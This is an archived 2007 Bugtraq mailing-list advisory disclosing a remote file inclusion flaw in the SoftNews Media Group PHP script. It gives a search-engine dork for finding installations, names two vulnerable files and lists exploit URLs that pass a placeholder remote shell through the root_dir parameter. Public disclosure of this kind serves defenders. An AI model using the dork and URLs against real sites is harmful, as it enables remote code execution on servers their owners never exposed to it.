[<prev] [next>] [day] [month] [year] [list]
Message-Id: <20070310065907.3E87A7AEA1@ws5-10.us4.outblaze.com>
Date: Sat, 10 Mar 2007 14:59:07 +0800
From: "RaeD Hasadya" <raed@...mail.com>
To: Bugtraq@...urityfocus.com
Subject: Remote File Include In Script SoftNews Media Group
By Hasadya Raed
Contact : RaeD@...Mail.Com
------------------------------------
Script : SoftNews Media Group
Dork : "Copyright © 2004,2006 SoftNews Media Group"
Greetz : Only To Security Focus
------------------------------------
B.Files :
init.php
editnews.php
------------------------------------
Exploits:
http://www.Victim.com/engine/init.php?root_dir=[Shell-Attack]
http://www.Victim.com/engine/Ajax/editnews.php?root_dir=[Shell-Attack]
------------------------------------
By Hasadya Raed
--
_______________________________________________
Get your free email from http://bsdmail.com
Powered by blists - more mailing lists